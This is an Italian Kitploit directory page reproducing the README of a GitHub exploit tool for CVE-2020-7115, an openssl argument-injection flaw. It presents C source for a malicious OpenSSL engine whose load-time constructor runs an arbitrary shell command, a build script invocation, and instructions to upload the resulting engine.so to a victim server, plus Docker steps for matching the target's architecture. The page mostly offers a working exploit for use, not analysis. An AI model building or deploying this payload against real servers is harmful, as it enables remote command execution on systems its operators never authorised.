Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/retr02332/cve-2020-7115
Generazione di PayloadAnalisi delle VulnerabilitàExploitShellcodeSfruttamento di Applicazioni WebPenetration Testing
GitHubretr02332/cve-2020-7115

CVE-2020-7115

Crea il tuo motore malevolo in secondi

Vedi Repository
115 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2020-7115

Crea il tuo motore malevolo in pochi secondi

build_engine.sh

Script semplice per generare un motore malevolo pronto per essere utilizzato in scenari di argument injection di openssl.

Come si usa?

È molto semplice, basta modificare il file engine.c con il comando che preferisci:

root@kitploit:~
#include <unistd.h>

__attribute__((constructor))
static void init() {
    execl("/bin/sh", "sh", "-c", "COMMAND");
}

Dopo aver fatto ciò, devi solo eseguire lo script in questo modo:

root@kitploit:~
bash build_engine.sh

Questo comando creerà una cartella chiamata output, al suo interno troverai un file chiamato engine.so che è quello che dovrai inviare al server tramite una funzionalità di upload di file.

Come avviare un docker per eseguire lo script e perché dovrei farlo?

È importante che tu sappia che devi creare il motore malevolo con le stesse caratteristiche del sistema vittima. Cioè... se il sistema target è in esecuzione su un linux a 64 bit, devi creare il motore malevolo su un linux a 64 bit.

Scarica lo strumento

Docker è una tecnologia fantastica per questo tipo di cose, e configurare il tuo ambiente è molto semplice.

Per prima cosa scarichiamo l'immagine docker da questo sito per un sistema debian linux a 64 bit:

root@kitploit:~
sudo docker pull debian

Quindi avvieremo il docker come segue:

root@kitploit:~
sudo docker run -v `pwd`:/code -it debian

Cerchiamo di capire un po' cosa abbiamo fatto qui. Il flag -v viene utilizzato per creare un volume, in questo caso stiamo associando il contenuto della cartella /code con il contenuto della nostra cartella corrente, da qui l'uso di pwd.

Con associazione intendo che tutto ciò che creiamo o modifichiamo in /code (cartella che si trova nella radice dell'immagine docker), lo avremo e lo vedremo in pwd e viceversa.

Nel nostro caso, pwd punta alla seguente directory sulla nostra macchina locale:

/home/retr0/CVE-2020-7115/

Il flag -it, invece, può essere interpretato come segue:

Il flag -t (--tty) dice a Docker di mappare una sessione di terminale virtuale all'interno del contenitore. Questo viene comunemente usato con l'opzione -i (--interactive), che mantiene STDIN aperto anche se eseguito in modalità detached.

Quindi, di fatto, usare il flag -it è utile quando vogliamo ottenere una shell dal contenitore in questione.

Non conosci la CVE-2020-7115?

Nessun problema, basta visitare questo post, e sono sicuro che capirai appieno questa vulnerabilità.